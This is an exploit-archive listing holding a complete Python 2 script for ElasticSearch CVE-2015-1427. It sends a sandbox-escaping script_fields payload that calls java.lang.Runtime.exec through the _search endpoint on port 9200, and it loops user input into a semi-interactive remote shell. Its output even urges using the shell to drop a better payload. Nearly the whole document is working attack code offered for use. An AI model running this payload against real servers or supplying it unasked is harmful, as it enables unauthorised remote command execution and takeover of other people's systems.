Lucene search

K
zdtDarren Martyn1337DAY-ID-23379
HistoryMar 12, 2015 - 12:00 a.m.

ElasticSearch Unauthenticated Remote Code Execution Exploit

2015-03-1200:00:00
Darren Martyn
0day.today
69

0.867 High

EPSS

Percentile

98.3%

Exploit for linux platform in category remote exploits

#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
__version__ = "20150309.1"
 
def banner():
    print """\x1b[1;32m
β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–“    β–„β–„β–„        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–„β–„β–„β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“ β–ˆβ–ˆβ–“ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–“     β–ˆβ–ˆβ–“   
β–“β–ˆ   β–€ β–“β–ˆβ–ˆβ–’   β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„    β–’β–ˆβ–ˆ    β–’ β–“  β–ˆβ–ˆβ–’ β–“β–’β–“β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–€ β–€β–ˆ  β–’β–ˆβ–ˆ    β–’ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆ   β–€ β–“β–ˆβ–ˆβ–’    β–“β–ˆβ–ˆβ–’   
β–’β–ˆβ–ˆβ–ˆ   β–’β–ˆβ–ˆβ–‘   β–’β–ˆβ–ˆ  β–€β–ˆβ–„  β–‘ β–“β–ˆβ–ˆβ–„   β–’ β–“β–ˆβ–ˆβ–‘ β–’β–‘β–’β–ˆβ–ˆβ–’β–’β–“β–ˆ    β–„ β–‘ β–“β–ˆβ–ˆβ–„   β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆ   β–’β–ˆβ–ˆβ–‘    β–’β–ˆβ–ˆβ–‘   
β–’β–“β–ˆ  β–„ β–’β–ˆβ–ˆβ–‘   β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆ   β–’   β–ˆβ–ˆβ–’β–‘ β–“β–ˆβ–ˆβ–“ β–‘ β–‘β–ˆβ–ˆβ–‘β–’β–“β–“β–„ β–„β–ˆβ–ˆβ–’  β–’   β–ˆβ–ˆβ–’β–‘β–“β–ˆ β–‘β–ˆβ–ˆ β–’β–“β–ˆ  β–„ β–’β–ˆβ–ˆβ–‘    β–’β–ˆβ–ˆβ–‘   
β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–“β–ˆ   β–“β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–’  β–’β–ˆβ–ˆβ–’ β–‘ β–‘β–ˆβ–ˆβ–‘β–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–’β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’
β–‘β–‘ β–’β–‘ β–‘β–‘ β–’β–‘β–“  β–‘β–’β–’   β–“β–’β–ˆβ–‘β–’ β–’β–“β–’ β–’ β–‘  β–’ β–‘β–‘   β–‘β–“  β–‘ β–‘β–’ β–’  β–‘β–’ β–’β–“β–’ β–’ β–‘ β–’ β–‘β–‘β–’β–‘β–’β–‘β–‘ β–’β–‘ β–‘β–‘ β–’β–‘β–“  β–‘β–‘ β–’β–‘β–“  β–‘
 β–‘ β–‘  β–‘β–‘ β–‘ β–’  β–‘ β–’   β–’β–’ β–‘β–‘ β–‘β–’  β–‘ β–‘    β–‘     β–’ β–‘  β–‘  β–’   β–‘ β–‘β–’  β–‘ β–‘ β–’ β–‘β–’β–‘ β–‘ β–‘ β–‘  β–‘β–‘ β–‘ β–’  β–‘β–‘ β–‘ β–’  β–‘
   β–‘     β–‘ β–‘    β–‘   β–’   β–‘  β–‘  β–‘    β–‘       β–’ β–‘β–‘        β–‘  β–‘  β–‘   β–‘  β–‘β–‘ β–‘   β–‘     β–‘ β–‘     β–‘ β–‘  
   β–‘  β–‘    β–‘  β–‘     β–‘  β–‘      β–‘            β–‘  β–‘ β–‘            β–‘   β–‘  β–‘  β–‘   β–‘  β–‘    β–‘  β–‘    β–‘  β–‘
                                              β–‘                                               
 Exploit for ElasticSearch , CVE-2015-1427   Version: %s\x1b[0m""" %(__version__)
 
def execute_command(target, command):
    payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
    try:
        url = "http://%s:9200/_search?pretty" %(target)
        r = requests.post(url=url, data=payload)
    except Exception, e:
        sys.exit("Exception Hit"+str(e))
    values = json.loads(r.text)
    fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
    print fuckingjson.strip()
         
 
def exploit(target):
    print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
    while True:
        cmd = raw_input("~$ ")
        if cmd == "exit":
            sys.exit("{!} Shell exiting!")
        else:
            execute_command(target=target, command=cmd)
     
def main(args):
    banner()
    if len(args) != 2:
        sys.exit("Use: %s target" %(args[0]))
    exploit(target=args[1])
 
if __name__ == "__main__":
    main(args=sys.argv)

#  0day.today [2018-04-06]  #